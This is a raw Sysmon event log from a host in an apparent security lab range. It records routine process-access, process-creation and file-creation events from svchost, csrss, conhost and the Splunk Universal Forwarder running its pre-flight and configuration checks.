12:02:55.068{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008240Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.068{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008239Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:55.068{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008238Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.068{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64EF-6064-E500-00000000AE01}6472C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008237Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.068{266CAFBE-64ED-6064-D500-00000000AE01}56486600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64EF-6064-E500-00000000AE01}6472C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+eef54|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ebd15|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008236Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.071{266CAFBE-64EF-6064-E500-00000000AE01}6472C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 2>&1C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008235Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.037{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008234Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:55.005{266CAFBE-64EE-6064-E400-00000000AE01}64646452C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008342Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:56.985{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F0-6064-F000-00000000AE01}1052C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008341Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.985{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008340Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:56.985{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008339Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.985{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008338Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:56.985{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008337Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.985{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-64F0-6064-F000-00000000AE01}1052C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008336Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.985{266CAFBE-64EF-6064-E600-00000000AE01}64366356C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{266CAFBE-64F0-6064-F000-00000000AE01}1052C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18274|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008335Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.995{266CAFBE-64F0-6064-F000-00000000AE01}1052C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64EF-6064-E600-00000000AE01}6436C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 23542300x80000000000000008334Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.923{266CAFBE-64F0-6064-EF00-00000000AE01}6696NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\splunk\composite.xmlMD5=BAA3D9652166DC4163F7323B34F168FA,SHA256=0A1E4AAE2B282671AA08BBBF61D7B1808B52B350A12845444CD028CBDBBDA44D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000008333Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.907{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64F0-6064-EF00-00000000AE01}6696C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008332Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.907{266CAFBE-64F0-6064-EF00-00000000AE01}66964052C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+116e675|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+f344c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008331Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.642{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F0-6064-EF00-00000000AE01}6696C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008330Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.642{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008329Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:56.642{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008328Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.642{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008327Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:56.642{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008326Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.642{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64F0-6064-EF00-00000000AE01}6696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008325Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.642{266CAFBE-64EF-6064-E600-00000000AE01}64366356C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{266CAFBE-64F0-6064-EF00-00000000AE01}6696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18226|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008324Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.652{266CAFBE-64F0-6064-EF00-00000000AE01}6696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd" check-transforms-keysC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-64EF-6064-E600-00000000AE01}6436C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000008323Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.595{266CAFBE-64F0-6064-EE00-00000000AE01}54365448C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000008322Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.346{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F0-6064-EE00-00000000AE01}5436C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008321Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.346{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 